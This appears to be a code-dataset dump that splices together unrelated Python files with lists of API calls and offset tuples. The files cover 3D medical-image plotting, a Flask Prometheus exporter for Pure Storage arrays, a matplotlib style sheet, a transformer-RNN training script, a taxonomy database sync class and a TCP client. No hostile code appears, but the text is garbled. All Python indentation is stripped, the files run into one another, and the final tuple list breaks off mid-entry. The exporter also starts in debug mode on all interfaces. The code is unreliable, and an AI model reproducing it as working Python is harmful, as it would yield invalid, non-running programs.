vmax (float): Same as in matplotlib.imshow. If `None`, take the global maximum of `struct_arr`.
overlay (3D array or tensor): The 3D array to plot as an overlay on top of the image. Same size as `struct_arr`.
overlay_cmap: The colomap for the overlay (default: `alpha_to_red_cmap`).
overlay_vmin (float): Same as in matplotlib.imshow. If `None`, take the global minimum of `overlay`.
overlay_vmax (float): Same as in matplotlib.imshow. If `None`, take the global maximum of `overlay`.
"""
if vmin is None:
vmin = struct_arr.min()
if vmax is None:
vmax = struct_arr.max()
if overlay_vmin is None and overlay is not None:
overlay_vmin = overlay.min()
if overlay_vmax is None and overlay is not None:
overlay_vmax = overlay.max()
print(vmin, vmax, overlay_vmin, overlay_vmax)
fig, axes = plt.subplots(3, num_slices, figsize=(15, 6))
intervals = np.asarray(struct_arr.shape) / num_slices
for axis, axis_label in zip([0, 1, 2], ["x", "y", "z"]):
for i, ax in enumerate(axes[axis]):
i_slice = int(np.round(intervals[axis] / 2 + i * intervals[axis]))
# print(axis_label, 'plotting slice', i_slice)
plt.sca(ax)
plt.axis("off")
plt.imshow(
sp.ndimage.rotate(np.take(struct_arr, i_slice, axis=axis), 90),
vmin=vmin,
vmax=vmax,
cmap=cmap,
interpolation=None,
)
plt.text(
0.03,
0.97,
"{}={}".format(axis_label, i_slice),
color="white",
horizontalalignment="left",
verticalalignment="top",
transform=ax.transAxes,
)
if overlay is not None:
plt.imshow(
sp.ndimage.rotate(np.take(overlay, i_slice, axis=axis), 90),
cmap=overlay_cmap,
vmin=overlay_vmin,
vmax=overlay_vmax,
interpolation=None,
)
def draw_mask_3d(image:np.array,ax:Axes3D=None,zorder:int=0,markersize:float=0.8,alpha:float=1,c=None):
"""
Draws all points which are not zero of given image in scatterplot
Parameters
----------
image: where to get mask from
ax: if given uses this axis object
zorder: order of points drawn
markersize: size of points
alpha: transparency of points
c: if anything points will be black
"""
fig = plt.figure()
if ax==None:
ax = Axes3D(fig)
else:
ax=ax
for cluster in range(1,int(np.unique(image)[-1]+1)):
if len(np.argwhere(image==cluster))==0:
print("no aneurysm found")
continue
if c==None:
ax.scatter(np.argwhere(image==cluster).T[0],np.argwhere(image==cluster).T[1],np.argwhere(image==cluster).T[2],s=markersize,alpha=alpha,zorder=zorder)
else:
ax.scatter(np.argwhere(image==cluster).T[0],np.argwhere(image==cluster).T[1],np.argwhere(image==cluster).T[2],s=3,alpha=alpha,zorder=zorder,c="black")
def draw_image(image:np.array,ax:Axes3D=None,zorder:int=0,markersize:float=0.8,transparency:bool=True):
"""
Draws all points which are not zero of given image in scatterplot in colors according to their intensity
Parameters
----------
image: where to get mask from
ax: if given uses this axis object
zorder: order of points drawn
markersize: size of points
transparency: if true scales transparency with intensity values
"""
fig = plt.figure()
if ax==None:
ax = Axes3D(fig)
else:
ax=ax
if transparency:
alpha= image[image>0]
alpha = np.where(alpha>0.15,alpha,0.01)
else:
alpha=1
cmap = plt.get_cmap('YlOrRd')
ax.scatter(np.argwhere(image>0).T[0],np.argwhere(image>0).T[1],np.argwhere(image>0).T[2],s=markersize,alpha=image[image>0],zorder=zorder,c=cmap(image[image>0]))
def draw_bounding_box(candidates,ax:Axes3D=None):
"""
Draws bounding box of given bounding box dictionary -> see postprocessing function
Parameters
----------
image: list of dictionaries where entry vertices contains the points of the bounding box
ax: if given uses this axis object
"""
fig = plt.figure()
if ax==None:
ax = Axes3D(fig)
else:
ax=ax
for candidate in candidates:
Z= candidate["vertices"]
Z=np.array(Z)
verts= [(Z[0],Z[1]),(Z[0],Z[2]),(Z[0],Z[3]),(Z[6],Z[1]),(Z[7],Z[1]),(Z[2],Z[5]),
(Z[2],Z[7]),(Z[3],Z[5]),(Z[3],Z[6]),(Z[4],Z[7]),(Z[4],Z[6]),(Z[4],Z[5])]
for element in verts:
x=[element[0][0],element[1][0]]
y=[element[0][1],element[1][1]]
z=[element[0][2],element[1][2]]
ax.plot(x,y,z,c='r',linewidth=2,alpha=1)
fig.show()
|
[
"sklearn.metrics.accuracy_score",
"sklearn.metrics.classification_report",
"matplotlib.animation.FuncAnimation",
"matplotlib.pyplot.figure",
"sklearn.metrics.f1_score",
"numpy.arange",
"matplotlib.colors.ListedColormap",
"numpy.round",
"numpy.unique",
"numpy.linspace",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.get_cmap",
"mpl_toolkits.mplot3d.Axes3D",
"numpy.asarray",
"sklearn.metrics.recall_score",
"numpy.argwhere",
"numpy.concatenate",
"sklearn.metrics.balanced_accuracy_score",
"numpy.zeros",
"matplotlib.pyplot.axis",
"numpy.where",
"numpy.take",
"numpy.array",
"sklearn.metrics.precision_score",
"matplotlib.pyplot.sca"
] |
[((2528, 2546), 'numpy.zeros', 'np.zeros', (['(256, 4)'], {}), '((256, 4))\n', (2536, 2546), True, 'import numpy as np\n'), ((2604, 2626), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(256)'], {}), '(0, 1, 256)\n', (2615, 2626), True, 'import numpy as np\n'), ((2677, 2721), 'matplotlib.colors.ListedColormap', 'mpl.colors.ListedColormap', (['alpha_to_red_cmap'], {}), '(alpha_to_red_cmap)\n', (2702, 2721), True, 'import matplotlib as mpl\n'), ((2743, 2761), 'numpy.zeros', 'np.zeros', (['(256, 4)'], {}), '((256, 4))\n', (2751, 2761), True, 'import numpy as np\n'), ((2819, 2841), 'numpy.linspace', 'np.linspace', (['(1)', '(0)', '(256)'], {}), '(1, 0, 256)\n', (2830, 2841), True, 'import numpy as np\n'), ((2892, 2936), 'matplotlib.colors.ListedColormap', 'mpl.colors.ListedColormap', (['red_to_alpha_cmap'], {}), '(red_to_alpha_cmap)\n', (2917, 2936), True, 'import matplotlib as mpl\n'), ((1411, 1452), 'sklearn.metrics.accuracy_score', 'sk_metrics.accuracy_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1436, 1452), True, 'from sklearn import metrics as sk_metrics\n'), ((1487, 1537), 'sklearn.metrics.balanced_accuracy_score', 'sk_metrics.balanced_accuracy_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1521, 1537), True, 'from sklearn import metrics as sk_metrics\n'), ((3536, 3550), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3548, 3550), True, 'import matplotlib.pyplot as plt\n'), ((4790, 4879), 'matplotlib.animation.FuncAnimation', 'mpl.animation.FuncAnimation', (['fig', 'update'], {'frames': 'frames', 'interval': 'interval', 'blit': '(True)'}), '(fig, update, frames=frames, interval=interval,\n blit=True)\n', (4817, 4879), True, 'import matplotlib as mpl\n'), ((6409, 6453), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', 'num_slices'], {'figsize': '(15, 6)'}), '(3, num_slices, figsize=(15, 6))\n', (6421, 6453), True, 'import matplotlib.pyplot as plt\n'), ((8107, 8119), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (8117, 8119), True, 'import matplotlib.pyplot as plt\n'), ((9197, 9209), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9207, 9209), True, 'import matplotlib.pyplot as plt\n'), ((9412, 9434), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""YlOrRd"""'], {}), "('YlOrRd')\n", (9424, 9434), True, 'import matplotlib.pyplot as plt\n'), ((9934, 9946), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9944, 9946), True, 'import matplotlib.pyplot as plt\n'), ((1587, 1629), 'sklearn.metrics.precision_score', 'sk_metrics.precision_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1613, 1629), True, 'from sklearn import metrics as sk_metrics\n'), ((1667, 1706), 'sklearn.metrics.recall_score', 'sk_metrics.recall_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1690, 1706), True, 'from sklearn import metrics as sk_metrics\n'), ((1742, 1794), 'sklearn.metrics.recall_score', 'sk_metrics.recall_score', (['y_true', 'y_pred'], {'pos_label': '(0)'}), '(y_true, y_pred, pos_label=0)\n', (1765, 1794), True, 'from sklearn import metrics as sk_metrics\n'), ((1829, 1881), 'sklearn.metrics.recall_score', 'sk_metrics.recall_score', (['y_true', 'y_pred'], {'pos_label': '(1)'}), '(y_true, y_pred, pos_label=1)\n', (1852, 1881), True, 'from sklearn import metrics as sk_metrics\n'), ((1915, 1950), 'sklearn.metrics.f1_score', 'sk_metrics.f1_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (1934, 1950), True, 'from sklearn import metrics as sk_metrics\n'), ((2263, 2311), 'sklearn.metrics.classification_report', 'sk_metrics.classification_report', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (2295, 2311), True, 'from sklearn import metrics as sk_metrics\n'), ((3701, 3734), 'numpy.take', 'np.take', (['struct_arr', '(0)'], {'axis': 'axis'}), '(struct_arr, 0, axis=axis)\n', (3708, 3734), True, 'import numpy as np\n'), ((4693, 4725), 'numpy.arange', 'np.arange', (['(num_frames - 1)', '(0)', '(-1)'], {}), '(num_frames - 1, 0, -1)\n', (4702, 4725), True, 'import numpy as np\n'), ((4753, 4777), 'numpy.arange', 'np.arange', (['(0)', 'num_frames'], {}), '(0, num_frames)\n', (4762, 4777), True, 'import numpy as np\n'), ((6470, 6498), 'numpy.asarray', 'np.asarray', (['struct_arr.shape'], {}), '(struct_arr.shape)\n', (6480, 6498), True, 'import numpy as np\n'), ((8150, 8161), 'mpl_toolkits.mplot3d.Axes3D', 'Axes3D', (['fig'], {}), '(fig)\n', (8156, 8161), False, 'from mpl_toolkits.mplot3d import Axes3D\n'), ((9240, 9251), 'mpl_toolkits.mplot3d.Axes3D', 'Axes3D', (['fig'], {}), '(fig)\n', (9246, 9251), False, 'from mpl_toolkits.mplot3d import Axes3D\n'), ((9343, 9378), 'numpy.where', 'np.where', (['(alpha > 0.15)', 'alpha', '(0.01)'], {}), '(alpha > 0.15, alpha, 0.01)\n', (9351, 9378), True, 'import numpy as np\n'), ((9977, 9988), 'mpl_toolkits.mplot3d.Axes3D', 'Axes3D', (['fig'], {}), '(fig)\n', (9983, 9988), False, 'from mpl_toolkits.mplot3d import Axes3D\n'), ((10089, 10100), 'numpy.array', 'np.array', (['Z'], {}), '(Z)\n', (10097, 10100), True, 'import numpy as np\n'), ((3924, 3954), 'numpy.take', 'np.take', (['overlay', '(0)'], {'axis': 'axis'}), '(overlay, 0, axis=axis)\n', (3931, 3954), True, 'import numpy as np\n'), ((4400, 4433), 'numpy.take', 'np.take', (['struct_arr', 'i'], {'axis': 'axis'}), '(struct_arr, i, axis=axis)\n', (4407, 4433), True, 'import numpy as np\n'), ((6769, 6780), 'matplotlib.pyplot.sca', 'plt.sca', (['ax'], {}), '(ax)\n', (6776, 6780), True, 'import matplotlib.pyplot as plt\n'), ((6793, 6808), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (6801, 6808), True, 'import matplotlib.pyplot as plt\n'), ((1212, 1234), 'numpy.concatenate', 'np.concatenate', (['y_true'], {}), '(y_true)\n', (1226, 1234), True, 'import numpy as np\n'), ((1260, 1282), 'numpy.concatenate', 'np.concatenate', (['y_pred'], {}), '(y_pred)\n', (1274, 1282), True, 'import numpy as np\n'), ((4500, 4530), 'numpy.take', 'np.take', (['overlay', 'i'], {'axis': 'axis'}), '(overlay, i, axis=axis)\n', (4507, 4530), True, 'import numpy as np\n'), ((6644, 6695), 'numpy.round', 'np.round', (['(intervals[axis] / 2 + i * intervals[axis])'], {}), '(intervals[axis] / 2 + i * intervals[axis])\n', (6652, 6695), True, 'import numpy as np\n'), ((8258, 8287), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8269, 8287), True, 'import numpy as np\n'), ((9450, 9472), 'numpy.argwhere', 'np.argwhere', (['(image > 0)'], {}), '(image > 0)\n', (9461, 9472), True, 'import numpy as np\n'), ((9476, 9498), 'numpy.argwhere', 'np.argwhere', (['(image > 0)'], {}), '(image > 0)\n', (9487, 9498), True, 'import numpy as np\n'), ((9502, 9524), 'numpy.argwhere', 'np.argwhere', (['(image > 0)'], {}), '(image > 0)\n', (9513, 9524), True, 'import numpy as np\n'), ((6867, 6906), 'numpy.take', 'np.take', (['struct_arr', 'i_slice'], {'axis': 'axis'}), '(struct_arr, i_slice, axis=axis)\n', (6874, 6906), True, 'import numpy as np\n'), ((8217, 8233), 'numpy.unique', 'np.unique', (['image'], {}), '(image)\n', (8226, 8233), True, 'import numpy as np\n'), ((7436, 7472), 'numpy.take', 'np.take', (['overlay', 'i_slice'], {'axis': 'axis'}), '(overlay, i_slice, axis=axis)\n', (7443, 7472), True, 'import numpy as np\n'), ((8394, 8423), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8405, 8423), True, 'import numpy as np\n'), ((8427, 8456), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8438, 8456), True, 'import numpy as np\n'), ((8460, 8489), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8471, 8489), True, 'import numpy as np\n'), ((8570, 8599), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8581, 8599), True, 'import numpy as np\n'), ((8603, 8632), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8614, 8632), True, 'import numpy as np\n'), ((8636, 8665), 'numpy.argwhere', 'np.argwhere', (['(image == cluster)'], {}), '(image == cluster)\n', (8647, 8665), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
from flask import Flask, request, abort, make_response
from flask_httpauth import HTTPTokenAuth
from urllib.parse import parse_qs
import re
from prometheus_client import generate_latest, CollectorRegistry, CONTENT_TYPE_LATEST
from flasharray_collector import FlasharrayCollector
import logging
class InterceptRequestMiddleware:
def __init__(self, wsgi_app):
self.wsgi_app = wsgi_app
def __call__(self, environ, start_response):
d = parse_qs(environ['QUERY_STRING'])
api_token = d.get('apitoken', [''])[0] # Returns the first api-token value
if 'HTTP_AUTHORIZATION' not in environ:
environ['HTTP_AUTHORIZATION'] = 'Bearer ' + api_token
return self.wsgi_app(environ, start_response)
app = Flask(__name__)
app.logger.setLevel(logging.INFO)
app.wsgi_app = InterceptRequestMiddleware(app.wsgi_app)
auth = HTTPTokenAuth(scheme='Bearer')
@auth.verify_token
def verify_token(token):
pattern_str = r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"
regx = re.compile(pattern_str)
match = regx.search(token)
return token if match is not None else False
@app.route('/')
def route_index():
"""Display an overview of the exporters capabilities."""
return '''
<h1>Pure Storage Prometeus Exporter</h1>
<table>
<thead>
<tr>
<td>Type</td>
<td>Endpoint</td>
<td>GET parameters</td>
</tr>
</thead>
<tbody>
<tr>
<td>Full metrics</td>
<td><a href="/metrics?endpoint=host&apitoken=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx">/metrics</a></td>
<td>endpoint, apitoken (optional, required only if authentication tokem is not provided)</td>
</tr>
<tr>
<td>Volume metrics</td>
<td><a href="/metrics/volumes?endpoint=host&apitoken=<KEY>">/metrics/volumes</a></td>
<td>endpoint, apitoken (optional, required only if authentication tokem is not provided)</td>
<td>Retrieves only volume related metrics</td>
</tr>
<tr>
<td>Host metrics</td>
<td><a href="/metrics/hosts?endpoint=host&apitoken=<KEY>">/metrics/hosts</a></td>
<td>endpoint, apitoken (optional, required only if authentication tokem is not provided)</td>
<td>Retrieves only host related metrics</td>
</tr>
<tr>
<td>Pod metrics</td>
<td><a href="/metrics/pods?endpoint=host&apitoken=<KEY>">/metrics/pods</a></td>
<td>endpoint, apitoken (optional, required only if authentication tokem is not provided)</td>
<td>Retrieves only pod related metrics</td>
</tr>
</tbody>
</table>
'''
@app.route('/metrics/<m_type>', methods=['GET'])
@auth.login_required
def route_flasharray(m_type: str):
"""Produce FlashArray metrics."""
if not m_type in ['array', 'volumes', 'hosts', 'pods']:
m_type = 'all'
collector = FlasharrayCollector
registry = CollectorRegistry()
try:
endpoint = request.args.get('endpoint', None)
token = auth.current_user()
registry.register(collector(endpoint, token, m_type))
except Exception as e:
app.logger.warn('%s: %s', collector.__name__, str(e))
abort(500)
resp = make_response(generate_latest(registry), 200)
resp.headers['Content-type'] = CONTENT_TYPE_LATEST
return resp
@app.route('/metrics', methods=['GET'])
def route_flasharray_all():
return route_flasharray('all')
@app.errorhandler(400)
def route_error_400(error):
"""Handle invalid request errors."""
return 'Invalid request parameters', 400
@app.errorhandler(404)
def route_error_404(error):
""" Handle 404 (HTTP Not Found) errors."""
return 'Not found', 404
@app.errorhandler(500)
def route_error_500(error):
"""Handle server-side errors."""
return 'Internal server error', 500
# Run in debug mode when not called by WSGI
if __name__ == "__main__":
app.logger.setLevel(logging.DEBUG)
app.logger.debug('running in debug mode...')
app.run(host="0.0.0.0", port=8080, debug=True)
|
[
"prometheus_client.CollectorRegistry",
"prometheus_client.generate_latest",
"flask.request.args.get",
"flask.Flask",
"flask.abort",
"urllib.parse.parse_qs",
"flask_httpauth.HTTPTokenAuth",
"re.compile"
] |
[((774, 789), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (779, 789), False, 'from flask import Flask, request, abort, make_response\n'), ((887, 917), 'flask_httpauth.HTTPTokenAuth', 'HTTPTokenAuth', ([], {'scheme': '"""Bearer"""'}), "(scheme='Bearer')\n", (900, 917), False, 'from flask_httpauth import HTTPTokenAuth\n'), ((1058, 1081), 're.compile', 're.compile', (['pattern_str'], {}), '(pattern_str)\n', (1068, 1081), False, 'import re\n'), ((3166, 3185), 'prometheus_client.CollectorRegistry', 'CollectorRegistry', ([], {}), '()\n', (3183, 3185), False, 'from prometheus_client import generate_latest, CollectorRegistry, CONTENT_TYPE_LATEST\n'), ((482, 515), 'urllib.parse.parse_qs', 'parse_qs', (["environ['QUERY_STRING']"], {}), "(environ['QUERY_STRING'])\n", (490, 515), False, 'from urllib.parse import parse_qs\n'), ((3214, 3248), 'flask.request.args.get', 'request.args.get', (['"""endpoint"""', 'None'], {}), "('endpoint', None)\n", (3230, 3248), False, 'from flask import Flask, request, abort, make_response\n'), ((3481, 3506), 'prometheus_client.generate_latest', 'generate_latest', (['registry'], {}), '(registry)\n', (3496, 3506), False, 'from prometheus_client import generate_latest, CollectorRegistry, CONTENT_TYPE_LATEST\n'), ((3444, 3454), 'flask.abort', 'abort', (['(500)'], {}), '(500)\n', (3449, 3454), False, 'from flask import Flask, request, abort, make_response\n')]
|
"Defines matplotlib stylesheet"
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
# %%-- Matplotlib style sheet
mpl.style.use('seaborn-paper')
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.serif'] ='STIXGeneral'
mpl.rcParams['font.size'] = 14
mpl.rcParams['mathtext.default'] = 'rm'
mpl.rcParams['mathtext.fallback'] = 'cm'
mpl.rcParams['mathtext.fontset'] = 'stix'
mpl.rcParams['axes.labelsize'] = 16
mpl.rcParams['axes.labelweight'] = 'normal'
mpl.rcParams['axes.grid.which']='both'
mpl.rcParams['axes.xmargin']=0.05
mpl.rcParams['axes.ymargin']=0.05
mpl.rcParams['grid.linewidth']= 0
mpl.rcParams['xtick.labelsize'] = 14
mpl.rcParams['xtick.bottom'] = True
mpl.rcParams['xtick.top'] = True
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.left'] = True
mpl.rcParams['ytick.right'] = True
mpl.rcParams['ytick.direction'] = 'in'
mpl.rcParams['ytick.labelsize'] = 14
mpl.rcParams['legend.fontsize'] = 14
mpl.rcParams['figure.titlesize'] = 18
mpl.rcParams['figure.figsize'] = (8.09,5)
mpl.rcParams['figure.autolayout'] = False
mpl.rcParams['figure.dpi'] = 75
mpl.rcParams['image.cmap'] = "viridis"
mpl.rcParams['savefig.dpi'] = 150
mpl.rcParams['errorbar.capsize'] = 3
mpl.rcParams['axes.prop_cycle'] = plt.cycler(color = plt.cm.viridis([0.8,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]))
mpl.rcParams['axes.titlesize'] = 16
# %%-
|
[
"matplotlib.style.use",
"matplotlib.pyplot.cm.viridis"
] |
[((140, 170), 'matplotlib.style.use', 'mpl.style.use', (['"""seaborn-paper"""'], {}), "('seaborn-paper')\n", (153, 170), True, 'import matplotlib as mpl\n'), ((1270, 1331), 'matplotlib.pyplot.cm.viridis', 'plt.cm.viridis', (['[0.8, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]'], {}), '([0.8, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9])\n', (1284, 1331), True, 'import matplotlib.pyplot as plt\n')]
|
from data_utils import UDC
from transformer_rnn import TransformerRNN
from args import get_args
from eval import eval_model
import torch
import numpy as np
from tqdm import tqdm
import torch.optim as optim
import torch.nn.functional as F
from sklearn.metrics import f1_score
import torch.nn as nn
args = get_args()
if args.gpu:
torch.cuda.manual_seed(args.randseed)
data = UDC(train_inp=args.train_inp,
val_inp=args.val_inp)
model = TransformerRNN(emb_dim=args.input_size, n_vocab=data.bpe.vocab_size(), rnn_h_dim=256, gpu = args.gpu)
criteria = nn.NLLLoss()
solver = optim.Adam(model.parameters(), lr=args.lr)
def train():
for epoch in range(args.epochs):
model.train()
print('\n\n-------------------------------------------')
print('Epoch-{}'.format(epoch))
print('-------------------------------------------')
train_iter = enumerate(data.get_batches('train'))
if not args.no_tqdm:
train_iter = tqdm(train_iter)
train_iter.set_description_str('Training')
train_iter.total = len(data.train)
for it, mb in train_iter:
c, c_u_m, c_m, r, r_u_m, r_m, y = mb
# print (c, c_u_m, c_m, r, y)
# getting predictions
pred = model(c, c_u_m, c_m, r, r_u_m, r_m)
#train_iter.set_description(model.print_loss())
#loss = F.nll_loss(pred, r)
#loss = criteria(pred, y)
#y = torch.argmax(y)
#print (y.size())
loss = criteria(pred, y)
loss.backward()
#print (model.conv3.grad)
#clip_gradient_threshold(model, -10, 10)
solver.step()
solver.zero_grad()
val_mrr = eval_model(model, data, 'valid')
print ('Validation MRR for this epoch:'+str(val_mrr))
if __name__ == '__main__':
train()
|
[
"tqdm.tqdm",
"data_utils.UDC",
"eval.eval_model",
"torch.cuda.manual_seed",
"args.get_args",
"torch.nn.NLLLoss"
] |
[((305, 315), 'args.get_args', 'get_args', ([], {}), '()\n', (313, 315), False, 'from args import get_args\n'), ((378, 429), 'data_utils.UDC', 'UDC', ([], {'train_inp': 'args.train_inp', 'val_inp': 'args.val_inp'}), '(train_inp=args.train_inp, val_inp=args.val_inp)\n', (381, 429), False, 'from data_utils import UDC\n'), ((563, 575), 'torch.nn.NLLLoss', 'nn.NLLLoss', ([], {}), '()\n', (573, 575), True, 'import torch.nn as nn\n'), ((333, 370), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['args.randseed'], {}), '(args.randseed)\n', (355, 370), False, 'import torch\n'), ((1752, 1784), 'eval.eval_model', 'eval_model', (['model', 'data', '"""valid"""'], {}), "(model, data, 'valid')\n", (1762, 1784), False, 'from eval import eval_model\n'), ((981, 997), 'tqdm.tqdm', 'tqdm', (['train_iter'], {}), '(train_iter)\n', (985, 997), False, 'from tqdm import tqdm\n')]
|
import logging
import logging.config
logger = logging.getLogger('sync_gbif2tnt')
import re
import pudb
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
from .InsertIntoTablesBase import InsertIntoTablesBase
class InsertExternalDatabaseBase(InsertIntoTablesBase):
def __init__(self, tntdbcon, temptablename):
InsertIntoTablesBase.__init__(self, tntdbcon)
self.temptable = temptablename
self.externaldatabasetable = 'TaxonNameExternalDatabase'
self.idcolumn = 'ExternalDatabaseID'
self.externalidstable = 'TaxonNameExternalID'
self.gbif_source = dict(config['gbif_source_details'])
self.edb_uri = self.gbif_source['uri']
self.edb_name = self.gbif_source['name']
self.edb_accession_date = self.gbif_source['accessiondate']
self.edb_version = self.gbif_source['version']
self.edb_license = self.gbif_source['license']
self.insertExternalDatabase()
self.insertExternalIDs()
def getExternalDatabaseID(self):
query = """
SELECT [ExternalDatabaseID]
FROM
[{0}]
WHERE
[ExternalDatabaseURI] = ?
AND [ExternalDatabaseName] = ?
AND [ExternalDatabaseVersion] = ?
""".format(self.externaldatabasetable)
self.cur.execute(query, [
self.edb_uri,
self.edb_name,
self.edb_version
])
row = self.cur.fetchone()
if row is None:
return None
else:
return row[0]
def insertExternalDatabase(self):
self.databaseid = self.getExternalDatabaseID()
if self.databaseid is not None:
return
else:
maxid = self.getMaxID(self.externaldatabasetable, self.idcolumn)
query = """
INSERT INTO [{0}] (
[ExternalDatabaseID]
, [ExternalDatabaseURI]
, [ExternalDatabaseName]
, [InternalNotes]
, [ExternalDatabaseVersion]
, [Rights]
)
VALUES (?, ?, ?, ?, ?, ?)
;""".format(self.externaldatabasetable)
self.cur.execute(query, [
maxid + 1,
self.edb_uri,
self.edb_name,
self.edb_accession_date,
self.edb_version,
self.edb_license
])
self.con.commit()
self.databaseid = maxid + 1
return
def insertExternalIDs(self):
query = """
INSERT INTO [{0}]
(
[NameID],
[ExternalDatabaseID],
[ExternalNameURI]
)
SELECT [NameID]
, {1} AS [ExternalDatabaseID]
, [GBIFTaxonURL]
FROM
[{2}]
;""".format(self.externalidstable, self.databaseid, self.temptable)
self.cur.execute(query)
self.con.commit()
|
[
"configparser.ConfigParser",
"logging.getLogger"
] |
[((47, 81), 'logging.getLogger', 'logging.getLogger', (['"""sync_gbif2tnt"""'], {}), "('sync_gbif2tnt')\n", (64, 81), False, 'import logging\n'), ((154, 168), 'configparser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (166, 168), False, 'from configparser import ConfigParser\n')]
|
import time
import warnings
import socket
from _thread import allocate_lock
from os import getpid
from speedysvc.toolkit.documentation.copydoc import copydoc
from speedysvc.client_server.base_classes.ClientProviderBase import ClientProviderBase
from speedysvc.client_server.network.consts import len_packer, response_packer
from speedysvc.compression.compression_types import zlib_compression
class NetworkClient(ClientProviderBase):
def __init__(self,
server_methods,
host='127.0.0.1', port=None,
compression_inst=zlib_compression):
"""
:param server_methods:
:param host:
"""
self.host = host
self.port = port
self.lock = allocate_lock()
ClientProviderBase.__init__(self, server_methods)
self.compression_inst = compression_inst
self.__connect()
def __connect(self):
self.conn_to_server = conn_to_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_to_server.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
conn_to_server.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 65536)
conn_to_server.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 65536)
conn_to_server.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
port = (
self.port
if self.port is not None
else self.server_methods.port
)
conn_to_server.connect((self.host, port))
conn_to_server.send(
self.compression_inst.typecode
)
def __del__(self):
self.conn_to_server.close()
@copydoc(ClientProviderBase.send)
def send(self, fn, data):
with self.lock:
return self._send(fn, data)
def _send(self, fn, data):
actually_compressed, data = \
self.compression_inst.compress(fn.serialiser.dumps(data))
cmd = fn.__name__.encode('ascii')
prefix = len_packer.pack(int(actually_compressed), len(data), len(cmd))
displayed_reconnect_msg = False
while True:
# Try to keep reconnecting if
# connection no longer functioning
try:
self.conn_to_server.send(prefix + cmd + data)
def recv(amount):
# Note string concatenation is slower in earlier versions
# of python, but should be faster than list concat in later
# versions after 3.
r = b''
while len(r) != amount:
add_me = self.conn_to_server.recv(amount)
if not add_me:
raise ConnectionResetError()
r += add_me
return r
actually_compressed, data_len, status = \
response_packer.unpack(recv(response_packer.size))
data = recv(data_len)
break
except (socket.error, ConnectionResetError):
if not displayed_reconnect_msg:
displayed_reconnect_msg = True
warnings.warn(
f"Client [pid {getpid()}]: "
f"TCP connection to service "
f"{self.server_methods.name} reset - "
f"the service may need to be checked/restarted!"
)
while True:
try:
import time
time.sleep(1)
self.__connect()
except (ConnectionRefusedError, ConnectionError):
continue
break
if actually_compressed:
data = self.compression_inst.decompress(data)
if status == b'+':
return fn.serialiser.loads(data)
else:
self._handle_exception(data)
raise Exception(data.decode('utf-8'))
if __name__ == '__main__':
inst = NetworkClient(5555)
t = time.time()
for x in range(500000):
i = b"my vfdsfdsfsdfsdfsdfdsfsdaluetasdsadasdsadsadsaest"# bytes([randint(0, 255)])*500
#print('SEND:', i)
assert inst.send('echo', i) == i
print(time.time()-t)
|
[
"os.getpid",
"socket.socket",
"speedysvc.client_server.base_classes.ClientProviderBase.ClientProviderBase.__init__",
"_thread.allocate_lock",
"time.time",
"time.sleep",
"speedysvc.toolkit.documentation.copydoc.copydoc"
] |
[((1643, 1675), 'speedysvc.toolkit.documentation.copydoc.copydoc', 'copydoc', (['ClientProviderBase.send'], {}), '(ClientProviderBase.send)\n', (1650, 1675), False, 'from speedysvc.toolkit.documentation.copydoc import copydoc\n'), ((4075, 4086), 'time.time', 'time.time', ([], {}), '()\n', (4084, 4086), False, 'import time\n'), ((739, 754), '_thread.allocate_lock', 'allocate_lock', ([], {}), '()\n', (752, 754), False, 'from _thread import allocate_lock\n'), ((763, 812), 'speedysvc.client_server.base_classes.ClientProviderBase.ClientProviderBase.__init__', 'ClientProviderBase.__init__', (['self', 'server_methods'], {}), '(self, server_methods)\n', (790, 812), False, 'from speedysvc.client_server.base_classes.ClientProviderBase import ClientProviderBase\n'), ((960, 1009), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (973, 1009), False, 'import socket\n'), ((4290, 4301), 'time.time', 'time.time', ([], {}), '()\n', (4299, 4301), False, 'import time\n'), ((3554, 3567), 